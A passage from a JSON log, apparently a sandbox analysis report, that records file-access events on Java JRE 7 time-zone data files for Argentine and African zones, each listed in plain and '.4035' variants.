(x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\buenos_aires.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\buenos_aires", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\catamarca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Catamarca", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\catamarca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\cordoba.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\cordoba", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\jujuy.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Jujuy", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\jujuy", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\la_rioja.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\La_Rioja", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\la_rioja", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\mendoza.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Mendoza", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\mendoza", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\rio_gallegos.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Rio_Gallegos", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\rio_gallegos", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\salta.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Salta", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\salta", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_juan.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_juan", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_luis.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Luis", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_luis", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\tucuman.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Tucuman", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\tucuman", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\ushuaia.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Ushuaia", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\ushuaia", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\abidjan.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Abidjan", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\abidjan", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\accra.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Accra", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\accra", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\addis_ababa.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Addis_Ababa", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\addis_ababa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\algiers.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\algiers", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\asmara.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\asmara", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bamako.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bamako", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bamako", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bangui.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bangui", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\banjul.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\banjul", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bissau.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bissau", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\blantyre.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\blantyre", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\brazzaville.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\brazzaville", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bujumbura.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bujumbura", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\cairo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\cairo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\casablanca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\casablanca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ceuta.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ceuta", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\conakry.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Conakry", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\conakry", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dakar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dakar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dakar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dar_es_salaam.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Dar_es_Salaam", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\dar_es_salaam", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\djibouti.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Djibouti", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\djibouti", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\douala.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\douala", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\el_aaiun.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\el_aaiun", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\freetown.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Freetown", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\freetown", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\gaborone.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\gaborone", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\harare.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Harare", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\harare", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\johannesburg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Johannesburg", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\johannesburg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kampala.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kampala", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kampala", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\khartoum.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\khartoum", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kigali.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kigali", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kinshasa.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kinshasa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lagos.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lagos", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\libreville.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\libreville", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lome.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lome", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\luanda.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\luanda", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lubumbashi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lubumbashi", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lubumbashi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lusaka.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lusaka", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\malabo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Malabo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\malabo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maputo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maputo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maputo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maseru.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maseru", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mbabane.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mbabane", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mbabane", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mogadishu.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mogadishu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\monrovia.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\monrovia", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nairobi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nairobi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ndjamena.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ndjamena", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\niamey.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\niamey", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott.4035", 